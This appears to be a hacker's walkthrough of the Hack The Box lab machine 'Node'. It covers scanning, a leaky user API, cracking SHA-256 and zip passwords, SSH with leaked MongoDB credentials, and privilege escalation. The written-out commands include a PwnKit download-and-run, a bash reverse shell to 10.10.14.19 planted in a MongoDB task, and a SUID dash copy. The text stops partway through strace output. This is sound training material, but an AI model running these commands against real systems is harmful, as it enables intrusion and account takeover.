11-Node
10.10.10.58
1、PortScan
Start with port scanning: masscan across all 65535 ports, and a quick nmap scan of the top 100 ports.
┌──(xavier㉿kali)-[~]
└─$ sudo masscan 10.10.10.58 -p1-65535 -e tun0 --max-rate 500
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 -F 10.10.10.58
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 18:00 CST
Nmap scan report for 10.10.10.58
Host is up (0.43s latency).
Not shown: 98 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.20 seconds
Raw packets sent: 204 (8.952KB) | Rcvd: 5 (204B)
I blindly guessed port 80 and was wrong; the nmap result shows an HTTP service on port 3000.
Next, look at that HTTP service, and at the same time keep a full-port nmap scan running in the background (the network is flaky, so this second pass is there to catch anything the first one missed).
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 -p- 10.10.10.58
The full scan shows only those two ports open.
Run nmap's default scripts against the open ports:
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 -p22,3000 10.10.10.58 -sC
[sudo] xavier 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 18:06 CST
Nmap scan report for 10.10.10.58
Host is up (0.70s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc5e34a625db43eceb40f4967b8ed1da (RSA)
| 256 6c8e5e5f4fd5417d1895d1dc2e3fe59c (ECDSA)
|_ 256 d878b85d85ffad7be6e2b5da1e526236 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.45 seconds
2、WebScan
Enumerate directories on the HTTP service while browsing the site by hand.
┌──(xavier㉿kali)-[~]
└─$ dirsearch -e php,html,txt -t 100 -u http://10.10.10.58:3000/ -r -x 403
┌──(xavier㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 100 --timeout 10s -u http://10.10.10.58:3000/ --exclude-length 3861
The home page lists three names; note them, they may come in handy for brute-forcing accounts.
tom
mark
rastating
While analysing, a request showed up in Burp that leaks sensitive information: the response returns usernames and passwords directly 😆!
Three hashes:
[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
Hash cracking
hashcat failed; to be analysed later
Write the three hashes to a file and try to crack them to plaintext:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: pthread--0x000, 708/1480 MB (256 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile 'hash.txt' on line 1 (f0e2e7...6a5c3f7c8d1d0191451ec77b4d75f240): Token length exception
Hashfile 'hash.txt' on line 2 (de5a1a...7f1057b61b7119fd130e1f7428705f73): Token length exception
Hashfile 'hash.txt' on line 3 (5065db...b97e231e3fe88570abc9edd8b78ac2f0): Token length exception
* Token length exception: 3/3 hashes
This error happens if the wrong hash type is specified, if the hashes are
malformed, or if input is otherwise not as expected (for example, if the
--username option is used but no username is present)
No hashes loaded.
Started: Thu Apr 13 00:49:27 2023
Stopped: Thu Apr 13 00:49:27 2023
Failed: hashcat cannot process the given hash values.
With no other option, fall back to an online site such as cmd5, which gives the plaintexts:
tom/spongebob
mark/snowflake
rastating/not found
The online platform confirms the algorithm is SHA-256, so go back and try hashcat again with the hash mode specified explicitly.
The hash type can be identified with hash-identifier (or hashid):
$ hashid <hash>
The hashcat mode number for SHA-256 is 1400; see https://hashcat.net/wiki/doku.php?id=example_hashes
The mode number can also be looked up like this:
$ hashcat -h | grep SHA-256
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt -O
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: pthread--0x000, 708/1480 MB (256 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 31
Hashes: 3 digests; 3 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: Not enough allocatable device memory for this attack.
Started: Thu Apr 13 01:23:17 2023
Stopped: Thu Apr 13 01:23:26 2023
I am not very fluent with hashcat either, so here is a list of hashcat references to go through when there is time.
hashcat references:
https://rednode.com/pentest/hashcat-cheat-sheet/
https://hashcat.net/wiki/doku.php?id=example_hashes
This error is not easy to fix. An AI's answer:
This error usually means that your device (GPU) does not have enough memory to run the chosen attack. It may be caused by a hash file or wordlist that is too large, or by trying to use too many devices while cracking multiple hashes at once.
Here are some approaches that may help:
- Reduce the size of the hash file or wordlist to lower memory usage.
- Try running the attack on fewer devices to reduce the load on each one.
- If you use multiple GPUs, make sure they all have the same amount of memory and that the hashcat version matches the GPU driver version.
- You can also try raising the device's virtual memory limit, although this may affect system performance and stability.
- Finally, if your device still cannot meet the requirements, you may need to consider buying a GPU with more memory.
Hope these suggestions help you solve the problem.
Since we already have two regular users, missing one more should not matter much.
Besides hashcat, john can also be used to crack them:
$ john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt
# show cracked results
$ john --show hash.txt
$ cat ~/.john/john.pot
3、WebUser
Logging in with tom/spongebob succeeds as a regular user.
The notice on the page says: "Currently only admin users can access the control panel, but check back later to test the standard user functionality!"
Analysing the site's traffic, one response carries the following information:
It shows that when an admin user logs in there is a Download Backup button. We could modify the is_admin field in the response to fool the front end, or follow the backup() JS function directly.
backup() sends a request to /api/admin/backup; that endpoint checks authorization, and non-admin users cannot pass it.
Another dead end. Looking back, the earlier web scan only covered the root directory; there is an /api/ path here, so enumerate /api/. Since we already have a regular user, add that user's cookie as well and see whether more clues turn up.
┌──(xavier㉿kali)-[~]
└─$ dirsearch -e jsp,php,html,txt -t 100 -u http://10.10.10.58:3000/api/ -r -x 403 --cookie="connect.sid=s%3A3FNQmGFnn_Cgl_OhItoMdDFYP_PzbP38.sjAgbwVSZQMWfvjO96GJ3hcWIFgNCVcwmqBxayGha50"
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: jsp, php, html, txt | HTTP method: GET | Threads: 100 | Wordlist size: 10396
Output File: /home/xavier/.dirsearch/reports/10.10.10.58-3000/-api-_23-04-13_01-54-49.txt
Error Log: /home/xavier/.dirsearch/logs/errors-23-04-13_01-54-49.log
Target: http://10.10.10.58:3000/api/
[01:54:50] Starting:
[01:55:09] 200 - 23B - /api/admin/backup/ (Added to queue)
[01:55:44] 200 - 176B - /api/session
[01:55:45] 200 - 176B - /api/session/ (Added to queue)
[01:55:51] 200 - 611B - /api/users/ (Added to queue)
[01:55:51] 200 - 611B - /api/users
Finally the /api/users endpoint reveals something good:
It later turns out this endpoint is unauthenticated: the sensitive data is returned even with the cookie removed.
We now have the admin account's username and SHA-256 password hash:
{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},
cmd5 again gives the username and password:
myP14ceAdm1nAcc0uNT/manchester
4、WebAdmin
This time log in with the admin account; the page looks like this:
Click the button, nothing to hesitate about. No idea what is waiting ahead.
A 3.3M backup file is downloaded successfully.
It should be an archive, but the file format needs to be determined.
filetype
I am not very familiar with this part either, so try several things.
Renaming the extension to zip, gz and tar.gz all failed.
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ file myplace.backup
myplace.backup: ASCII text, with very long lines (65536), with no line terminators
# still no idea what it is
Looking closely, the contents look like base64; try decoding.
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat myplace.backup | base64 -d > 1.txt
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ ls -l
总计 9304
-rw-r--r-- 1 xavier xavier 2594909 4月13日 02:23 1.txt
-rw-r--r-- 1 xavier xavier 65 4月13日 00:55 hash1.txt
-rw-r--r-- 1 xavier xavier 195 4月13日 01:21 hash.txt
-rw-r--r-- 1 xavier xavier 3459880 4月13日 02:09 myplace.backup
-rw-r--r-- 1 xavier xavier 3459880 4月13日 02:17 myplace.backup.png
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ head 1.txt
PK
▒�Uvar/www/myplace/UT ��b��6dux
PK E"KL}�74S!var/www/myplace/package-lock.jsonUT ���YK��Yux
The PK header shows it is a zip file; rename it and extract.
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ mv 1.txt 1.zip
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ unzip 1.zip
Archive: 1.zip
creating: var/www/myplace/
[1.zip] var/www/myplace/package-lock.json password:
😧 It needs a password too. Think...
crack zip
Enumerate the zip password with john the ripper.
john the ripper: a powerful password-cracking tool that can crack zip file passwords among others. Convert the zip file into a format john understands with "zip2john file.zip > hash.txt", then run john with "john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt".
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ zip2john 1.zip > ziphsh.txt
Created directory: /home/xavier/.john
ver 1.0 1.zip/var/www/myplace/ is not encrypted, or stored with non-handled compression type
[...pass...]
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ziphsh.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (1.zip)
1g 0:00:00:00 DONE (2023-04-13 02:34) 50.00g/s 9830Kp/s 9830Kc/s 9830KC/s 24782478..piggy9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The extraction password is magicword.
Some other tools can also be used for zip password enumeration:
fcrackzip: a dictionary-based tool that tries a list of strings to decrypt a password-protected zip file. Run it with "fcrackzip -b -v -D -p /usr/share/wordlists/rockyou.txt file.zip".
zipcracker: a brute-force tool for cracking zip file passwords. Run it with "zipcracker -b -c charset -l length -u -s file.zip".
Sensitive information gathering
Gather sensitive information from the backup files.
package.json exposes the version:
MongoDB 2.2.x
app.js exposes the MongoDB connection username and password:
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
5、Mongo & SSH
Try connecting to the database; it fails:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ mongo 10.10.10.58:27017/myplace -u mark -p 5AYRft73VtFpc84k
MongoDB shell version v6.0.1
connecting to: mongodb://10.10.10.58:27017/myplace?compressors=disabled&gssapiServiceName=mongodb
Error: couldn't connect to server 10.10.10.58:27017, connection attempt failed: SocketException: Error connecting to 10.10.10.58:27017 :: caused by :: Connection timed out :
connect@src/mongo/shell/mongo.js:380:17
@(connect):2:6
exception: connect failed
exiting with code 1
Recall that port 27017 was not found open in the initial scan, so set this aside for now.
Since we obtained MongoDB login credentials above, try them for SSH:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ ssh mark@10.10.10.58
mark@10.10.10.58's password:
[...pass...]
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ whoami
mark
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
sshpass can also log in directly:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ sshpass -p 5AYRft73VtFpc84k ssh mark@10.10.10.58
[...pass...]
Last login: Wed Apr 12 20:18:30 2023 from 10.10.14.11
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
mark@node:~$
Once in, gather information; linpeas.sh can be uploaded directly, fetched with wget:
mark@node:~$ wget http://10.10.14.11/linpeas.sh
--2023-04-13 03:15:44-- http://10.10.14.11/linpeas.sh
Connecting to 10.10.14.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776073 (758K) [text/x-sh]
linpeas.sh: Permission denied
Cannot write to 'linpeas.sh' (Success).
The home directory is not writable; switch to /tmp.
mark@node:~$ cd /tmp
mark@node:/tmp$ wget http://10.10.14.11/linpeas.sh
--2023-04-13 03:17:02-- http://10.10.14.11/linpeas.sh
Connecting to 10.10.14.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776073 (758K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[=====================================================================>] 757.88K 336KB/s in 2.3s
2023-04-13 03:17:05 (336 KB/s) - 'linpeas.sh' saved [776073/776073]
Automated information gathering in preparation for privilege escalation.
mark@node:/tmp$ chmod +x linpeas.sh
mark@node:/tmp$ ./linpeas.sh > result
Manual checks show a local MongoDB service listening on port 27017; worth connecting to later.
mark@node:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 324 10.10.10.58:22 10.10.14.11:59938 ESTABLISHED on (0.50/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36344 ESTABLISHED keepalive (99.75/0/0)
tcp 0 0 127.0.0.1:36344 127.0.0.1:27017 ESTABLISHED keepalive (34.86/0/0)
tcp 0 0 127.0.0.1:36336 127.0.0.1:27017 ESTABLISHED keepalive (4.78/0/0)
tcp 0 0 127.0.0.1:36340 127.0.0.1:27017 ESTABLISHED keepalive (49.83/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36342 ESTABLISHED keepalive (160.17/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36334 ESTABLISHED keepalive (244.14/0/0)
tcp 0 0 127.0.0.1:36338 127.0.0.1:27017 ESTABLISHED keepalive (39.85/0/0)
tcp 0 0 127.0.0.1:36342 127.0.0.1:27017 ESTABLISHED keepalive (19.88/0/0)
tcp 0 0 127.0.0.1:36334 127.0.0.1:27017 ESTABLISHED keepalive (47.53/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36338 ESTABLISHED keepalive (205.22/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36336 ESTABLISHED keepalive (19.88/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36340 ESTABLISHED keepalive (64.94/0/0)
tcp6 0 0 :::3000 :::* LISTEN off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 266744 /run/user/1001/systemd/notify
Set that aside for now; look at the linpeas.sh output first and analyse it.
Download the results first, since the remote session is laggy; use scp:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ scp mark@10.10.10.58:/tmp/result .
mark@10.10.10.58's password:
Permission denied, please try again.
mark@10.10.10.58's password:
result 100% 138KB 11.9KB/s 00:11
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat result
From the results, a few potential leads:
Privilege escalation leads
OS: Linux version 4.4.0-93-generic (buildd@lgw01-03) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017
sudo CVE-2021-4034
Kernel vulnerabilities:
[+] [CVE-2017-16995] eBPF_verifier
[+] [CVE-2016-5195] dirtycow
[+] [CVE-2016-5195] dirtycow 2
[+] [CVE-2021-4034] PwnKit
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2017-7308] af_packet
[+] [CVE-2017-6074] dccp
[+] [CVE-2017-1000112] NETIF_F_UFO
[+] [CVE-2016-8655] chocobo_root
[+] [CVE-2016-4997] target_offset
[+] [CVE-2016-4557] double-fdput()
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
[+] [CVE-2019-18634] sudo pwfeedback
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2018-1000001] RationalLove
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
[+] [CVE-2017-1000253] PIE_stack_corruption
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
[+] [CVE-2016-2384] usb-midi
[+] [CVE-2016-0728] keyring
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet CVE-2016-8655
[2] exploit_x CVE-2018-14665
[3] get_rekt CVE-2017-16695
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root),1002(admin)
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
uid=1001(mark) gid=1001(mark) groups=1001(mark)
# tom has a lot of group memberships; consider escalating to that user first
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
# gcc is present, so a kernel exploit could perhaps be compiled on the box
╔══════════╣ Analyzing Mongo Files (limit 70)
Version: MongoDB shell version: 3.2.16
db version v3.2.16
git version: 056bf45128114e44c5358c7a8776fb582363e094
OpenSSL version: OpenSSL 1.0.2g 1 Mar 2016
allocator: tcmalloc
modules: none
build environment:
distmod: ubuntu1604
distarch: x86_64
target_arch: x86_64
-rw-r--r-- 1 root root 568 Jul 27 2017 /etc/mongod.conf
storage:
dbPath: /var/lib/mongodb
journal:
enabled: true
systemLog:
destination: file
logAppend: true
path: /var/log/mongodb/mongod.log
net:
port: 27017
bindIp: 127.0.0.1
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-- 1 root admin 17K Sep 3 2017 /usr/local/bin/backup (Unknown SUID binary)
# tom could use this SUID binary for privilege escalation
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/mongodb/mongod.log
/var/log/syslog
/var/log/kern.log
/var/log/auth.log
/tmp/result
Privilege escalation
Method 1: exploit-based privilege escalation
sudo CVE-2021-4034 exploit:
Using a precompiled tool:
mark@node:~$ cd /tmp
mark@node:/tmp$ wget http://10.10.14.11/PwnKit
mark@node:/tmp$ chmod +x PwnKit
mark@node:/tmp$ ./PwnKit
root@node:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(mark)
root@node:/tmp# cat /root/root.txt
62b0adecc196c0b485be47a394d5b9a4
root@node:/tmp# cat /home/tom/user.txt
f08a2ecd696eedbb9adec6eb2b5a0036
root@node:/tmp#
The server has gcc, so the exploit could also be uploaded and compiled there.
Search for the exploit:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ searchsploit --cve 2021-4034
--------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------- ---------------------------------
PolicyKit-1 0.105-31 - Privilege Escalation | linux/local/50689.txt
--------------------------------------------- ---------------------------------
Shellcodes: No Results
This version kept failing to compile, so I gave up on it.
Method 2
Take a different route to escalate.
The goal is to get to the tom user first.
Now try connecting to MongoDB and see what is inside.
mark@node:/tmp$ mongo 127.0.0.1:27017/myplace -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: 127.0.0.1:27017/myplace
> help
[...pass...]
>
> db.stats();
{
"db" : "myplace",
"collections" : 1,
"objects" : 4,
"avgObjSize" : 135.75,
"dataSize" : 543,
"storageSize" : 36864,
"numExtents" : 0,
"indexes" : 1,
"indexSize" : 36864,
"ok" : 1
}
> db.version();
3.2.16
The MongoDB version is 3.2.16; I found no relevant vulnerabilities for it.
No leads, so go back to the linpeas.sh output and look for anything overlooked.
tom
The tom user collected earlier should be an escalation target, so focus on tom-related information, and find:
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
[...pass...]
tom 1241 0.4 7.7 1112004 58628 ? Ssl Apr12 4:48 /usr/bin/node /var/www/myplace/app.js
mongodb 1242 0.4 11.2 288144 85212 ? Ssl Apr12 4:06 /usr/bin/mongod --auth --quiet --config /etc/mongod.conf
tom 1245 0.0 5.8 1008568 44708 ? Ssl Apr12 0:10 /usr/bin/node /var/scheduler/app.js
These sensitive files have not been looked at yet and are worth a look.
/var/www/myplace/app.js is the backup we downloaded earlier; look at /var/scheduler/app.js instead.
mark@node:~$ more /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});
Analysing this JS shows it gives us command execution.
This JavaScript uses the MongoDB Node.js driver to query all documents in a collection named 'tasks' and stores them in the array docs. If there are documents and no error, it iterates over each document and:
- prints the _id of the task being executed (the document's ID);
- executes the command stored in the document (the cmd field) with exec();
- deletes the document from the 'tasks' collection.
Because this JS contains the MongoDB connection string, we can log in to MongoDB directly and create a record for the JS above to execute. That is the plan: create a reverse shell.
Connect to the database
MongoDB command reference: https://www.runoob.com/mongodb/mongodb-tutorial.html
mark@node:~$ mongo 127.0.0.1:27017/scheduler -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: 127.0.0.1:27017/scheduler
> db.stats()
{
"db" : "scheduler",
"collections" : 1,
"objects" : 0,
"avgObjSize" : 0,
"dataSize" : 0,
"storageSize" : 24576,
"numExtents" : 0,
"indexes" : 1,
"indexSize" : 24576,
"ok" : 1
}
> db.getCollectionNames()
[ "tasks" ]
> db.tasks.find()
> db.tasks.insert({cmd: '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.19/8888 0>&1"'})
WriteResult({ "nInserted" : 1 })
>
Because the JS deletes the task after running it, the nc listener must be started before the record is created; once the record is inserted, nc receives the reverse shell:
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.58] 46076
bash: cannot set terminal process group (1242): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$ tom@node:/$ cat /home/tom/user.txt
cat /home/tom/user.txt
2a3fb81c1a346d06b19e2d6a2151525b
Some notes on other people's methods
db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/bmfx; chown tom:admin /tmp/bmfx; chmod 6755 /tmp/bmfx;" })
After waiting a while, run
/tmp/bmfx -p
to get a shell as tom.
I have seen others do the following after getting an nc reverse shell:
Upgrade to a fully interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Background the session
(CTRL+Z)
Type "fg":
stty raw -echo;fg
Press enter a few times.
I tested it and sometimes it leaves the shell garbled.
root
With the tom user, the first thing that comes to mind is the SUID file /usr/local/bin/backup found earlier; take a look.
tom@node:/$ ls -l /usr/local/bin/backup
ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
tom@node:/$ strings /usr/local/bin/backup
strings /usr/local/bin/backup
[...pass...]
%s[!]%s %s
[32m
%s[+]%s %s
%s[+]%s Starting archiving %s
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | Secure Backup v1.0 | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
Could not open file
Validated access token
Ah-ah-ah! You didn't say the magic word!
Finished! Encoded backup is below:
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
/root
/etc
/tmp/.backup_%i
/usr/bin/zip -r -P magicword %s %s > /dev/null
/usr/bin/base64 -w0 %s
[...pass...]
Write the base64 string above to a file, then decode it as before:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat b.txt | base64 -d > b.zip
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ file b.zip
b.zip: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ unzip b.zip
Archive: b.zip
skipping: root.txt need PK compat. v5.1 (can do v4.6)
Searching for this error, suggestions online were to extract with 7z.
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ 7z x b.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs LE)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: b.zip
--
Path = b.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat root.txt
Got the flag by accident? Wrong! It is just a trap; look for yourself if interested. 😆
Download backup locally for analysis:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ scp mark@10.10.10.58:/usr/local/bin/backup .
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ file backup
backup: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
tom@node:/tmp$ strace -o backup.txt backup
strace -o backup.txt backup
tom@node:/tmp$ cat backup.txt
cat backup.txt
execve("/usr/local/bin/backup", ["backup"], [/* 14 vars */]) = 0
brk(NULL) = 0x90a9000
fcntl64(0, F_GETFD) = 0
fcntl64(1, F_GETFD) = 0
fcntl64(2, F_GETFD) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf77fb000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=31341, ...}) = 0
mmap2(NULL, 31341, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf77ce000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib32/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
